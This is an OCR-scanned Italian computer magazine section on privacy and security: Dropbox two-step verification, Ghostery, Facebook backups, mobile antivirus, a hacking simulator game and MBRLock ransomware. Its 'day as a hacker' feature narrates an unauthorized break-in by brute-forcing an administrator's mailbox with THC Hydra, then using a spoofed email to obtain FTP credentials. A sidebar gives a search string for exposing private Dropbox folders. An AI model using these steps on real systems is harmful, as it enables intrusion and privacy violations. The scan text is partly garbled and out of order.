Raggiungiamo il sito Web www.dropbox.com e logghia- 
| moci. Se non siamo ancora registrati, clicchiamo su Sign 
in e successivamente su Create an account. seguiamo 
la procedura guidata. Al termine, clicchiamo sul nome del nostro 
account e accediamo al menu Settings/Security. 


Attiviamo la doppia verifica 

Scorriamo verso il basso la pagina che appare tino a 
raggiungere la sezione Account sign in. Da qui clicchia¬ 
mo su change posto in corrispondenza di Two-step 
verification. Selezioniamo l'opzione Use text messages e pro¬ 
seguiamo con un clic su Next. 


Cosa ci 
occorre 

SERVIZIO CLOUD 

DROPBOX 

Quanto costa: Gratuito 
Sito Internet: 

www.dropbox.com 



BASTA UN 
SOLO SMS 


Per evitare di inserire il 
codice numerico ricevuto 
via SMS ogni volta che 
ci connettiamo dal no¬ 
stro PC, in fase di login 
spuntiamo Trustthis 
computer. Così facendo 
verrà richiesto il codice di 
sicurezza solo su compu¬ 
terdifferenti da quello 
che usiamo tutti i giorni. 


ACCESSO A 
CARTELLE PRIVATE 

Se si avvia una ricerca 
in Google con la stringa 
site:http//www.drop 
box.com/gallery è possi¬ 
bile accedere a migliaia di 
cartelle private di altret¬ 
tanti account Dropbox. 
Trai risultati capita non di 
rado di imbattersi in foto 
che presumibilmente do¬ 
vevano rimanere decisa¬ 
mente private. Il consiglio 
è quello di rinominare 
le cartelle in maniera 
casuale e non sequenziale 
( gallery1,gallery2...) 



Un codice inviato per SMS 

is Inseriamo quindi il nostro numero di cellulare e confer 
Lmiamo con Next Appare un codice di sicurezza: anno 
' tiamolo perché in caso di smarrimento del telefonino c 
permetterà di accedere ugualmente al nostro spazio Dropbox 
Terminiamo con Enable two-step verification. 


MEGLIO CRIPTAREI DATI SU DROPBOX 


Dropbox permette di accedere ai nostri dati 
ovunque ci troviamo. Peccato che anche 
altri possano farlo! Basta infatti una semplice 
query Google per scovare cartelle pubbliche 
(“Public" e “Photos") di account Dropbox. 
Di default il loro contenuto è visibile in Rete 
solo quando l'utente ne rende pubblico 
l'indirizzo, ad esempio inserendolo in un 
post su un forum. Pertanto la cosa migliore 
da fare è crittografare i dati prima di salvar¬ 
li sul cloud usando un programma come 
BoxCryptor (presente sul Win CD-Rom) 
per renderli virtualmente impossibili da 
leggere per chiunque non abbia la giusta 
chiave. Per creare una cartella cifrata avvia¬ 


mo BoxCryptor e clicchiamo su Next e su 
Browse. Cerchiamo la cartella di Dropbox e 
premiamo Off. Nel cam po Choose thè nome 
inseriamo un nome perla cartella (di default 
è BoxCryptor) e clicchiamo due volte Next. 
Digitiamo una password per l'accesso ai dati 
cifrati e premiamo Finish. Al termine appare 
il messaggio Congratulations. La cartella 
apparirà come una nuova unità in Esplora 
Risorse e tutti i file che copieremo in essa 
verranno criptati. Per accedervi anche da 
altri PC installiamo il programma anche su 
questi e scegliamo la cartella cifrata presen¬ 
te nella cartella Dropbox, quindi inseriamo 
la password usata per essa. 
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I Account dropbox sotto chiave I 


Ti spio da PC C 


Mentre navighiamo c’è qualcuno che analizza le nostre 

attività sul Web. Ecco come stanarlo e renderlo inoffensivo 


La grande Rete 
ci osserva 


Cosa ci 
occorre 

ADD-ON PER BROWSER 

GHOSTERY 

Lo trovi su: r*<CD 

Sito internet: 

www.ghostery.com 
Note il plug-in è 
disponibile per tutti 
i pnncipali browser. 

La versione per 
Chrome deve essere 
scaricata dal Web 
seguendo la procedura 
mostrata nel tutorial 


Q uando navighiamo su Internet, qualunque sia il sito vi¬ 
sitato, siamo costantemente monitorati da aziende che 
hanno il compito di raccogliere i nostri dati personali. 
Mentre molte di queste hanno scopi del tutto innocenti, altre 
lo fanno esclusivamente per poi rivenderli al miglior offerente. 
Difendersi da questa pratica è pressoché impossibile, anche 
perché gli elementi che tracciano la navigazione sono difficil¬ 


mente individuabili se non ricorrendo ad appositi strumenti. 
Disponibile sotto forma di plug-in per i browser Web più diffusi, 
Ghostery è un tool che, oltre a individuare facilmente quali azien¬ 
de spiano i dati della nostra sessione di navigazione, fornisce 
anche dettagliate informazioni sul loro operato, dandoci così 
la possibilità di bloccarne il tracciamento. Ecco come installare 
la versione per Chrome. 


.... _ 0- K 0 xt 5 Mt 
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3p* Library Updatas 
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«ddilions lo Ghostery'* Myaiv and includes them automati cii#v 

t natiting auto update is laghtr recommended 

V: CHck baro to «nabla 3pa Library Auto4Jpdata 


HI 


Scarichiamo Ghostery... 

Avviamo Chrome, colleghiamoci all'indiriz- 
zo www.ghostery.com e clicchiamo sul pul- 
ì sante Download Now. La pagina mostrerà 
l'elenco dei browser supportati evidenziando quel¬ 
lo che stiamo utilizzando. Nel nostro caso, clicchia¬ 
mo Download Ghostery for Google Chrome now!. 


e poi installiamolo 

Qualunque sia il browser su cui installeremo 
| Ghostery, la procedura d'installazione del 
plug-in è essenzialmente identica. In pra¬ 
tica, si tratta di cliccare su Installa , Aggiungi (come 
nel caso di Google Chrome) o Accetta, conferman¬ 
do l’operazione quando richiesto. 


Tutti pronti in quattro mosse 

0 : Terminata l'installazione (se si tratta di Rre- 
|fox occorre riavviare il browser). saremo 
I invitati a procedere con la configurazione 
del plug-in. Clicchiamo GetStarted. prosegifiamo 
cliccando due volte su Nexte spuntiamo la casella 
Click here to enable 3pe Library Auto-Update 
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Tutto in un pulsante 

a iCIicchiamo ancora Next, attiviamo l'opzione 
Click here to enable Blocking e terminiamo 
con Finish. Qualora volessimo modificare 
la configurazione del plug-in, le opzioni di Ghostery 
si raggiungono cliccando sul pulsante Options pre¬ 
sente di fianco alla barra degli indirizzi. 


Smascheriamo gli spioni 

0 Da questo momento Ghostery è operativo, 
rivelando la sua presenza non appena nel 
browser verrà caricata una pagina Web. Le 
notifiche che appaiono in alto a destra ci indiche¬ 
ranno quanti e quali sono gli elementi impiegati 
nella pagina per tracciare la navigazione. 


Il blocco ci rende invisibili 

Cliccando sul pulsante (fi Ghostery e» sce¬ 
gliendo More Info visualizzeremo te infor¬ 
mazioni estese sull'azienda che raccogle i 
dati. Cliccando EditBlocking Optonse sputando te 
varie opzioni disponibSi, impediremo alte aziende & 
raccogliere i nostri dati personali. 
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fr Ti spio da PC 


I Social network in cassaforte I 


Social network in cassaforte 


S Come posso mettere al sicuro foto, video e dati 

archiviati nel mio profilo Facebook? 

-/ Voglio cancellare il mio account, esiste un modo 
per effettuare un backup prima di procedere? 


SERVE A CHI... 

.. .vuole esportare il proprio profilo 
Facebook mettendo al riparo i dati 
da eventuali perdite 


L a perdita dei dati è un evento traumatico 
e, purtroppo, chi utilizza un PC, prima o poi 
finisce per affrontare quest'esperienza. L'inco¬ 
lumità dei dati non viene garantita da nessun 
supporto, per cui l'unico modo per porre rime¬ 
dio alla catastrofe informatica più grave che 
esista, è ricorrere a backup frequenti da tenere 
al sicuro su più supporti. Nonostante offrano 
livelli di sicurezza molto elevati, anche i server 
dei siti Internet sono a rischio, e ora che buona 
parte della nostra vita informatica è conservata 
sul Web, vedersi azzerare un account potrebbe 
significare una perdita di dati e informazioni più 
grave di quanto accadrebbe se s'incendiasse 
l'hard disk del nostro PC. Da semplice social net¬ 
work, Facebook può ormai essere considerato 


alla stregua di un archivio remoto che conserva 
buona parte della nostra storia personale. Le 
foto, i video, i contatti, i messaggi e tutte le altre 
informazioni che abbiamo aggiunto negli anni 
al nostro profilo, molto spesso sono conservati 
solo nei server di Facebook, dove un qualunque 
problema può trasformarsi nella totale dipartita 
dei nostri dati. 

Profilo archiviato 

Le cause che possono portare alla perdita dei 
dati conservati nel nostro account Facebook 
sono tante. Oltre a guasti hardware e attacchi 
diretti ai data center del social network, il/Tostro 
profilo potrebbe essere preso in ostaggio da 
hacker che ci rubano la password di accesso o 
venire bannato in seguito alla violazione del 
regolamento. Anche se possiamo creare un 
nuovo profilo, nulla ci ridarà i contatti e i conte¬ 
nuti che avevamo collezionato con tanta fatica. 
Come accade per file e documenti archiviati nel 
nostro PC, ci accorgiamo di quanto sia impor¬ 
tante un backup solo quando ormai è troppo 


Facciamo il backup della nostra vita digitale 



tardi. Eppure, creare un backup di tutto ciò 
che abbiamo condiviso sul social network di 
Mark Zuckerberg è un'operazione banalissima. 
Non c'è bisogno di software o procedure par¬ 
ticolari, gli strumenti sono sotto i nostri occhi 
e ci consentono di esportare informazioni del 
profilo, post, foto, video, contatti, messaggi e 
commenti. Spendendo solo pochi minuti pre¬ 
serveremo il nostro profilo Facebook da tutti i 
rischi accennati pocanzi; inoltre, l'operazione 
può esserci d'aiuto anche nel caso in cui volessi¬ 
mo cancellare definitivamente il nostro account 
portando con noi tutto ciò che custodisce. 


LA PRUDENZA NON È MAI TROPPA 

I dati pubblicati sul proprio profilo Facebook sono stret¬ 
tamente personali, ragion per cui, oltre alla password, 
qualora si tenti di scaricare l'archivio utilizzando un 
dispositivo non riconosduto, all'utente sarà richiesta una 
ulteriore verifica. Per assicurarsi che il processosi stato 
avviato dal legittimo proprietario dell'account, Facebook 
chiede all'utente di riconoscere 5 amici tramite i tag delle 
foto. Se si commette un errore, la procedura può essere 
ripresa solo dopo aver digitato il codice CAPTCHA inviato 
via SMS al numero di cellulare collegato all'account. 



1 Colleghiamoci a www.facebook.com/set- 
tings. Effettuato l'accesso al nostro profilo 
ci ritroveremo nella sezione Impostazioni ac¬ 
count di Facebook. Clicchiamo sul collegamen¬ 
to Scarica una copia, digitiamo la password 
del nostro profilo e clicchiamo su Avvia il mio 
archivio. 


2 11 tempo necessario affinché il backup ven¬ 
ga generato spazia da pochi minuti a un 
paio d'ore. Il link per accedere all'archivio sarà 
recapitato al nostro indirizzo e-mail: clicchiamo 
quindi sul collegamento, inseriamo nuovamen¬ 
te la password del nostro profilo e facciamo 
clic su Continua. 


Con Scarica archivio avvieremo il down¬ 
load del backup. Scompattiamo l'archivio 
e facciamo doppio clic sul file index.html. An¬ 
che se si apre nel browser, la pagina mostra le 
informazioni contenute nel backup. Con Pro¬ 
filo, Bacheca, Foto ecc. navigheremo nei dati 
del nostro profilo. 
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I Smartphone protezione totale I 


Ti spio daPC^ 


Kaspersky Mobile Securitv protegge il cellulare da furti 

bloccando anche chiamate indesiderate e app nocive 


Smartphone, 
protezione totale 


Cosa ci 
occorre 


ANTIVIRUS PER 
SMARTPHONE 


Kaspersky 
Mobile 
Security Lite 


Quanto costa: Gratuito 


Sito Internet: https7/ 
play.google.com/store 


G li smartphone Android sono piccoli 
computer su cui è possibile installare 
applicazioni e navigare su Internet. Ma 
proprio come i PC di casa, possono essere 
presidi mira dai pirati informatici che instal¬ 
lano a nostra insaputa malware per rubarci 
informazioni personali. Ecco quindi che si 


rende necessario installare un software di 
sicurezza come Kaspersky Mobile Security 
Lite per proteggerci dalle applicazioni pe¬ 
ricolose. Questa versione mobile della suite 
già apprezzata sui PC, offre una protezione 
base per il telefonino segnalandoci le app 
potenzialmente nocive prima che possano 


fare danni. Inoltre, permette di recuperare 
il telefonino in caso di furto e bloccarlo da 
remoto cancellando le informazioni perso¬ 
nali con un semplice comando inviato via 
SMS. Infine, offre la possibilità di filtrare i 
messaggi e le chiamate bloccando quelle 
provenienti da numeri indesiderati. 





verranno applicane le tariffa ■stortenJ prr n 
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Installiamo l’antivirus 

^Andiamo su Googte Play Store e scarichiamo 
l'app Kaspersky Mobile Security Lite. La prima 
I volta che viene avviata, dovremo seguire la 
procedura guidata per la configurazione. Premiamo 
Continua e poi Accetto per aderire al contratto di licen¬ 
za. Impostiamo una password per impedire l’accesso 
al programma e premiamo Avanti. 


Protezione attiva 

Inseriamo quindi l’indirizzo di posta elettro¬ 
nica che vogliamo utilizzare per il ripristino 
della password e premiamo Abilita. A questo 
punto la suite di protezione è attiva, col servizio di 
sicurezza cloud che scansiona le nuove applicazio¬ 
ni che vengono installate segnalando quelle poten¬ 
zialmente nocive. 


Ai sicuro dai furti 

a Tappiamo Antifurto. Con SMS-Block possia¬ 
mo bloccare da remoto il telefonino inviando 
il comando block:passwordsegretam SMS. 
Con SMS-Clean. invece, cancelliamo le informazio¬ 
ni personali col comando wipe:passwordsegreta. 
Con SMS-Find riceviamo le coordinate via e-mail col 
comando find.passwordsegreta. 



Al riparo dagli scocciatori 

a Attivando invece l'opzione Filtro chiamate/SMS 
possiamo bloccare le telefonate e i messaggi 
ricevuti da persone indesiderate. Dobbiamo 
innanzitutto scegliere la modalità di blocco, quindi cre¬ 
are la Lista bioccab con i numeri che vogliamo bloc¬ 
care per gli SMS e le chiamate, e la Lista consentiti. 



KASPERSKY ONE: UNO PER TUTTI! 


Sul Google Play Store (www.winmagazine.it/link/1444) è 
possibile acquistare la versione completa di Kaspersky Mobile 
Security che, alle funzioni di antifurto e filtro SMS e chiamate, 
aggiunge anche un modulo antispam, la possibilità di pianifi¬ 
care le scansioni antivirus e un sistema di controllo dell'accesso 
ai dati archiviati nella memoria dello smartphone. Permette, 
inoltre, di seguire e bloccare il telefonino a distanza anche 
nel caso in cui viene sostituita la SIM. Non manca neppure 
il sistema di protezione delia privacy, che permette di na¬ 
scondere i contatti selezionati e scegliere quali informa; 
rendere accessibili alle persone che usano il telefono. L' 
può essere acquistata sui Play Store a 6,95 euro, oppure cc 
parte integrante della suite Kaspersky One, che offre una 
protezione completa non solo per lo smartphone ma 
per PC, Mac e tablet (www.kaspersky.com/it/one). 





















Una giornata 
da hacker 


Con un piccolo aiuto abbiamo 
provato tecniche di attacco 
“proibite”. Ecco i retroscena 



Cosa ci 
occorre 

SIMULAZIONE 
DI HACKING 

MOTHER 

Lo trovi su: i?CD 

Sito Internet: www. 

v4ldemar.net/projects/ 

mother/index.php 

Note: Con alcune 
configurazioni «•' 
hardware di Windows 
7 il gioco potrebbe 
mostrare problemi 
di compatibilità. In 
questi casi utilizziamo 
la versione Mother 
ZerOS. scaricabile 
gratuitamente da 
www.winmagazine.it/ 
link/1054. La procedura 
di utilizzo è comunque 
identica a quella 
mostrata nel tutorial. 


C e l'abbiamo fatta: abbiamo vissuto sulla 
nostra pelle l’esperienza di diventare ha¬ 
cker per un giorno, accompagnati da uno 
dei migliori esperti sul campo, che si è prestato 
a farci da cicerone in questa folle avventura. 
Perché diventare un hacker, uno di quelli seri, 
è difficile, richiede tempo e preparazione. Così, 
per chi non ne ha, non resta che affidarsi a uno 
del mestiere, seguendolo nella sua giornata-tipo. 
Ventiquattr’ore fatte di studio dei sistemi altrui, 
scelta di un obiettivo, pianificazione dell'attacco 
e, per non farsi mancare nulla, accesso anoni¬ 
mo e ovviamente non autorizzato al computer 
della vittima! 

La cassetta degli attrezzi 

Come in ogni avventura che si rispetti, per go¬ 
dersela fino in fondo, però, c’è una dotazione 
di base da possedere. E non parliamo tanto 
di nozioni tecniche, difficilmente acquisibili' 
in poco tempo, quanto piuttosto di software: 
programmi, insomma, utili alle missioni d i un 
hacker. Di solito, tutti questi strumenti vengono 
raccolti nel corso degli anni, scrupolosamente 
catalogati e costantemente aggiornati, proprio 
come si trattasse di un’officina coi ferri del me¬ 
stiere per un meccanico. In realtà, ci spiega Ke¬ 
vin (nome di fantasia scelto dall'hacker in onore 
di Kevin "Condor” Mitnick, senza ombra di 
dubbio il più famoso programmatore, phreaker, 
chracker, hacker e ingegnere sociale della storia 
dell’informatica), un hacker deve essere in grado 
di recuperare lo strumento giusto al momento 
giusto. Anche lontano dal proprio computer, e 
senza avere a d isposizione la classica "eh iavetta 
USB dei miracoli", che l'hacker utilizza come 
valigetta degli attrezzi. È per questo che uno dei 
primi passi consiste proprio nella selezione di 
programmi e utility. Solo dopo aver completato 
questa fase cruciale, l'hacker entra finalmente 
in azione! 
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HACKER AL LAVORO 

Per mettere in pratica le tecniche proibite di un 
attacco informatico, abbiamo vissuto un’intera 
giornata di fianco ad un hackere al suo fido com¬ 
puter. Ecco quello che abbiamo i mparato. 
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E presto per entrare in azione! 

Non scherziamo: non sia mai 
che un hacker, a quest’ora, è 
già sveglio! La notte si tira tardi e visto 
che la mente deve essere lucida, meglio 
dedicare non meno di sette ore al riposo. 
Dopotutto, è uno dei due ingredienti per 
lubrificare al meglio il cervello... 


Facciamo scorta di buone energie 

... il secondo, ovviamente, è la 
colazione. Bella ricca di zuc- 
cheri, perché il glucosio dà lo sprint deci¬ 
sivo ai neuroni. A questo punto, Kevin si 
mette davvero al lavoro. Il computer, per 
agevolare la spiegazione e fornire sugge¬ 
rimenti e spunti utili anche ai meno esper¬ 
ti, non hu software smanettoni già instal¬ 
lati ed è dotato di Windows 7. Nella maggior 
parte dei casi, comunque, ne usa un altro 
con Linux, più utilizzato e "adattabile” per 
questi scopi. Anche il sistema operativo 





■ Il progetto Tor (www.torproject.org) permette di 
far perdere le proprie tracce su Internet e navigare 
anonimi. 
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Microsoft, comunque, vanta molti pro¬ 
grammi utili agli hacker ed è per questo 
che il nostro geniaccio apre una pagina di 
Firefox, browser delezione nell’under¬ 
ground informatico. La prima puntatina 
la fa sul sito del progetto Tor (www.tor- 
project.org). È un programma utile per far 
perdere le proprie tracce mentre si naviga. 
In pratica, si basa sul passaggio dei dati 
scambiati su Internet tramite nodi (cioè 
server) intermedi: per visitare un determi¬ 
nato sito, si passa attraverso un'ampia re¬ 
te di altri computer, sparsi per tutto il pia¬ 
neta. Così, chi tenta di risalire all'origine, 
dovrebbe, in teoria, ricostruire questo lun¬ 
go e intricato percorso. Ed è un'operazione 


talmente complessa da far desistere gli 
interessati. Una volta scaricato e installa¬ 
to il programma, Kevin naviga dunque 
liberamente sul Web, senza timore di poter 
essere rintracciato. “L’anonimato, anche 
se non è mai garantito al 100%, è la prio¬ 
rità assoluta per un hacker", si affretta a 
dirci. 


Il grimaldello dell’hacker 
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Con le spalle coperte in fatto 
di privacy, il nostro hacker, 



■ Cain & Abel è un cosiddetto sniffer di rete che 
permette di "spiare" le comunicazioni altrui, 
monitorando i vari indirizzi IP. 


innanzitutto, di un "password cracker”, 
vale a dire un programma in grado di scar¬ 
dinare i sistemi di autenticazione di servi¬ 
zi Web e software che necessitano della 
classica accoppiata nome utente/password. 
“Ce ne sono di parecchi tipi, ma i migliori 
rimangono sempre Cain &Abel (www.oxid. 
it/cain.html) e John thè Ripper (www.open- 
wall.com/john)”. Così scarica il primo e, 
insieme a questo, anche THC Hydra (http:// 
thc.org/ thc-hydra): “è un software vecchia 
maniera, piuttosto difficile da installare, 
perché prima lo si deve compilare, ma poi 
consente di superare parecchi sistemi di 
protezione, e senza troppa fatica”, speci¬ 
fica il nostro accompagnatore negli oscu¬ 
ri meandri dell’hacking. 



adesso, si collega a un sito per il download 
di software più... pericoloso. Insomma, 
si tratta di quegli strumenti utili per effet¬ 
tuare analisi avanzate di obiettivi e intru¬ 
sioni, quindi c’è da fare attenzione. In 
teoria, scaricare questi programmi non 
rappresenta un reato, ma se qualcosa do¬ 
vesse andare storto, costituirebbe una 
prova del coinvolgimento in qualche tipo 
di attacco. La sicurezza non è mai troppa. 
La lista della spesa di Kevin si compone, 
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Le giuste precauzioni 

La dotazione software di base 
del perfetto hacker, in fondo, 
sta tutta qui. Ma sono i dettagli a fare la 
differenza. Dettagli che, in questo caso, 
rispondono al nome di altri programmi. 
Quello di un firewall, per esempio. Un pro¬ 
gramma, cioè, che scherma il sistema di 
Kevin dagli attacchi di altri hacker, o dai 
sistemi di difesa di alcuni servizi Web. Inu¬ 
tile dire che la scelta, in questo campo, è 
impressionante, anche se WIPFW (http:// 
wipfw.sourceforge.net) rimane una delle 
soluzioni più apprezzate per chi vuole un 
filtro serio e preciso come un cecchino. E 
che, soprattutto, non faccia rallentare trop¬ 
po la preziosa connessione. Nessun fire- 

































• Neanche un hacker può rinunciare ad un firewall 
con funzionalità di filtraggio dei pacchetti di dati: 
solo così può bloccare eventuali intrusioni nei suoi 
sistemi. 


wall, comunque, dà mai la sicurezza al 
100% di tenere alla larga i malware "spa¬ 
rati" dalla concorrenza, ed è per questo che 
a Kevin, adesso, serve qualche protezione 
"attiva". Per esempio un antivirus: ne ser¬ 
ve uno di molto veloce, efficiente e versa¬ 
tile, e la scelta punta sul mitico Immunet 
3.0 (www.immunet.com). Si tratta di un 
software basato sul cuore tecnologico di 
Ciani AV (www.clamav.net), l'antivirusopen 
source per eccellenza. In questo modo, se 
qualche hacker nemico sarà in grado di 
infilare dei malware nel computer di Kevin, 
il prode antivirus lo rileverà ed eliminerà 
in un batter d’occhio. Già che c’è, Kevin 
scarica un paio di altri programmi: non 
riusciamo a vedere di che si tratta (e lui si 
giustifica sornione con un laconico: “se¬ 
greto professionale"), ma chissà che non 
lo scopriremo a breve. 

Una piccola pausa 

OK, l'arsenale è pronto, ma 
prima di passare all’azione... 
è meglio addentare una bella bistecca: 
si pranza! 
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Rendiamoci anonimi in Rete 

Un quarto d'ora è la durata me¬ 
dia del pranzo del vero hacker. 
Che, anzi, di solito lo consuma davanti al 
PC. Kevin, adesso, avvia innanzitutto Tor, 
per rendersi anonimo (anche se il termine 
corretto, fa sapere, è “diffìcilmente rintrac¬ 
ciabile"). Quindi punta a un sito, che dice 
essere poco protetto, per mostrarci quan¬ 
to è semplice, a volte, prendere possesso 
di un sistema. Si tratta di una compagnia 
nel ramo di prodotti informatici. Nella se¬ 
zione del rispettivo sito dedicata ai contat- 
ti, Kevin recupera l’indirizzo e-mail 
dell'amministratore del sistema. Poi, sfrut¬ 
tando THC Hydra, e la parte iniziale dell’in¬ 
dirizzo come nome utente, avvia un attac¬ 
co di "forza bruta" per scovare la password. 
Curiosamente, si allontana dalla postazio¬ 


ne e se ne torna con patatine e bibite. “Ci 
sarà da attendere...". 

Siamo dentro al sistema... 


interessa. Al nostro hacker, infatti, basta 
aspettare che l’amministratore invii la ri¬ 
sposta, per andare a sbirciare proprio nel¬ 
la sua posta inviata! 










• Uno degli strumenti più utilizzati dall'hacker è 
quello che permette di inviare e-mail fasulle alla 
propria vittima. 

mous Mail (www.sendanonymousemail. 
net), e invia un messaggio all’amministra¬ 
tore di sistema, da parte del manager. Nel 
messaggio, chiede i dati di accesso al ser¬ 
ver FTP, per caricare delle presentazioni 
di grosse dimensioni. 1 servizi di fake mail, 
di solito, non permettono di ricevere le e- 
mail di risposta, ma questo a Kevin non 


; TS‘5 


L’attacco è riuscito! 

Bingo! In un'oretta e mezza 
l’amministratore si decide a 
rispondere. Antonio ricava i dati FTP e, di 
fatto, ha accesso al server (al quale ci si 
collega con un programma come FileZilla, 
http://filezilla-project.org). Quanto basta 
per eseguire un "defacement”, cioè sosti¬ 
tuire l’home page del sito con una confe¬ 
zionata ad hoc. Ma questa è solo una di¬ 
mostrazione e il nostro hacker preferisce 
lasciare tutto com’è, non prima di essersi 
girato verso di noi, tronfio, con un sorrisi¬ 
no compiaciuto sulle labbra! 
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Ed infatti, l’attesa dura più di 
tre ore, ma alla fine la pas¬ 
sword è in manoall'hacker. Il quale, a que¬ 
sto punto, è in grado di leggere la posta 
dell'amministratore di sistema. Spulcian¬ 
do tra le missive elettroniche, Kevin risale 
all’indirizzo e-mail di uno dei manager 
della compagnia. L’hacker, a questo punto, 
sfrutta un servizio di invio di e-mail far- 
locche (fake e-mail), come Send Anony- 
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I Una giornata da hacker I 


Ti spio da PCf* 


@Vesti i panni di un hacker 

Nessuna azione di hacking a rischio di denuncia, ma una vera e propria simulazione che ci fa vivere l’ebbrezza 
di un attacco informatico a tutti gli effetti. Ecco la procedura da seguire. 



L'dittata verdone disponibile per il Download e' la o 4 Atpfca 


t f'.tAV; mr c-u.-'*ro<iv<;ui •...■luta non f i a o 



F GONG HF»ATA TA l T Oli NOI NON - VA Di Dirf TTI 't SUOSTADi 

C Ot SVJ1JJPPO E LONTANO DAI. ; 





lA MASb<MA CAUTELA EGOENDO ATTENTAMENTE TUTTA LA DOC'JME» 

IT AZIONE C CRNITA A CORREDO j 


SOFTWARE NON POSS-FOr. Al CUN 11PO Dt GARANZIA ESPI 

tCITA © IMPLICITA LAUTO#* 


DEC IMA Ot!A; 7-'A r , RIPONGA? LP A DERIVANTE DA E' EN’UAL- D 

NV PROVOCATI DALL'USO 0| 


jUESTO software 



Cficcr. w ur.o rtoi lochi rfv 0pe*5t-v: supponi qc w are 



Download Mother ZerOS 






^ Installazione fai date 

l | * Il simulatore scelto è Mother: per installarlo, scompattiamo l'archivio 
Mother.zip (presente sul Win CD-ROM) ed eseguiamo il file mother- 
v/.O.execontenuto al suo interno. Quindi, installiamo, nell’ordine, le patch 
mother-v1.01-upgrade.exe e mother-vl.02-upgrade.exe. 



a ; I nostri primi passi 

3 I Nel box visualizzato clicchiamo sul pulsante OK e prepariamoci a 
giocare. Intanto creiamo il personaggio: per esempio, clicchiamo su 
Tecnico, Procedi , Cracker, Procedi e ancora Procedi. Clicchiamo su Annul¬ 
la. Clicchiamo sull'icona M, in basso a sinistra, e poi su Network Map. 


Sj Vcrs. 0.4 Alpha , 


nser Integrila' Si stema 

|th«bulb.indianwar« 
j«rcot! : • .4-1 FHN .-4- 

■ sS- Advaneed ZerOS Anti Virus Extantion - wl.O • 18 Mbyte - Cr; 129 
| proxyd - Proxy Daemon - vl.O - 21 Mbyte - Cr: 167 
| walld - Firewall Daemon - vl.O - 24 Mbyte - Cr 183 
I cypherd - Data Cypher Daemon - vl.O - 27 Mbyte - Cr: 223 
| bkservd - Net Backup Daemon • vl.O -19 Mbyte - Cr: 159 
il rshd - Remote Shell Daemon - vi 0 ■ 22 Mbyte - Cr: 190 
|i debuggerd - Debugger Service Daemon - vl.O - 27 Mbyte - Cr: 234 
|» yodcc - Godware Code Compiler - v12.0 • 89 Mbyte - Cr: 496 
Si * Rootbreaker e' forse II piu vecchio, noto e potente password cracker mai realizzai 


a Sistemiamo le password... 


g | Clicchiamo sul pulsante Download e poi su OK" per scaricarlo. Scor¬ 
ai»/ riamo quindi l’elenco di programmi disponibili fino a individuare la 
voce rootbreaker, un tool utile trovare password. Scarichiamo anche questo. 
A questo punto clicchiamo ancora su M e selezioniamo Disconnetti 



Autenticarsi, prego! 

Terminata l'installazione del simulatore di hacking e delle due patch di 
aggiornamento, selezioniamo la voce di menu Start/Tutti iprvg&m- 
mi/MotherZerOS/MotherZerOSFailsafe. In Usernamee Password - a- 
mo dei dati di autenticazione di fantasia e confermiamo premendo ftrvw 






^ Antivirus finto? Mi ci ficco! 

Spostiamo il cursore del mouse verso destra, fino a inquadrare noe 
sul mappamondo, Clicchiamo sul quadratino lampeggiante e po r 
basso a destra, su Connetti. Nel riquadro in alto a sinistra dia* amo su ur 
primo software da scaricare (per finta): l'antivirus Zave. 



▲ Attacco finale! 

0 | Clicchiamo Me selezioniamo l'opzione Network Map. Scornamele a 
mappa della rete che appare verso sinistra e clicchiamo sul quao-ìy 
no lampeggiante che troviamo a livello degli USA. Clicchiamo Connetti Sele¬ 
zioniamo Me Rootbreaker basterà per crackare la password del sito 7 
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V: Ti spio da PC 


I I tuoi documenti ostaggi del virus I 


I tuoi documenti 
ostaggi del virus 


Occhio a MBRLock, il trojan ransomware che blocca l’acceso 
ai dati presenti nel PC. Ecco come non cadere nella trappola 


^it<nntir>n I Uiurinw; nrt iv<» M ow corinti nìte.twxlort. 

TMr. Klnitows oivpy te iìletjftl ami i»nt nsgf i si arati proferivi. Th« 
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Thls cod-e ytm cùu find In yotir Windows distribuitoli package. 1 
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iteti istruii lim code west be enu-rad mot lutee lAen thrti* Uiiyv, 3 
tlie un 1 riek t i«y in' iiij i uuttst i.b 1 th¬ 


riller **>rk is nn 
Ut sfcrn t ld.ii code. 


If you hot finti thè 


a Ecco il messaggio che appare all’avvio del PC con cui MBRLock ci invita ad acquistare 
una nuova licenza di Windows. 


I l ruolo del PC nella società attuale è 
ormai vasto e poliforme: dal semplice 
utilizzo casalingo, in cui lo si usa per 
archiviare i propri dati personali e naviga¬ 
re liberamente, ai server dove tenere dati 
di ufficio, alle postazioni di lavoro, a vere 
e proprie postazioni adibite alla gestione 
di centrali nucleari. Nei PC passano ogni 
giorno milioni di informazioni e molti 
dati sensibili sia personali sia aziendali. 
Ecco perché queste postazioni vengono 
costantemente prese di mira da hacker 
e pirati informatici: si tratta, infatti, di 
preziose fonti di informazioni con le quali 
poter ricattare le eventuali vittime. Imma¬ 
giniamo di veder sparire tutti i nostri dati 
personali, in un attimo, e vederci mostrare 
sul monitor una richiesta di riscatto per 
poter riavere tali dati sani e salvi. È questo 
il concetto alla base di una nuova conce¬ 
zione di malware, denominati ransom¬ 
ware, che affondano le proprie radici nel 
1989 ma che hanno ripreso voga in questi 


ultimi anni, con la 
diffusione espo¬ 
nenziale dei PC in 
ogni ambito della 
vita quotidiana. 

Il pericolo 
viene da 
lontano 

I più esperti ricor¬ 
deranno il trojan 
AIDS, un virus iso¬ 
lato nel 1989 che, una volta infettato il PC, 
rimaneva silente per 90 riavvii del sistema 
per poi criptare tutti i dati dell'hand-disk e 
chiedere di effettuare un pagamento alla 
PC Cyborg Corporation al fine di ottenere 
la chiave di decodifica in grado di sbloccare 
l'accesso ai dati. Se nel 1989 i danni poteva¬ 
no essere decisamente più limitati, visto il 
numero di gran lunga inferiore di computer 
nel mondo e il lunghissimo tempo neces¬ 
sario alla diffusione di un virus, nel 2011 i 
danni sono potenzial¬ 
mente molto più estesi: 
i virus informatici sono 
all’ordine del giorno ed 
ecco perché dal 2007 
è stata registrata una 
crescita esponenziale 
di questa tipologia di 
malware, ottima fon¬ 
te di guadagno peri 
virus writer. Sebbene 
alcune tipologie di ran¬ 
somware utilizzino ef¬ 
fettivamente algoritmi 
di crittografia impossi¬ 
bili da decifrare, quali 
AES 256 bit (utilizza¬ 
to dal ministero della 
difesa americano per 
crittografare file con¬ 
siderati "top secret”), 
non sempre i livelli di 


crittografìa utilizzati da tali infezioni sono 
effettivamente così complessi: spesso molti 
ransomware utilizzano esclusivamente tec¬ 
niche di ingegneria sociale per spaventare 
l'utente e fargli credere di aver preso in 
ostaggio tutti i propri dati, convincendo¬ 
lo a pagare una determinata’somma per 
riaverli indietro. 

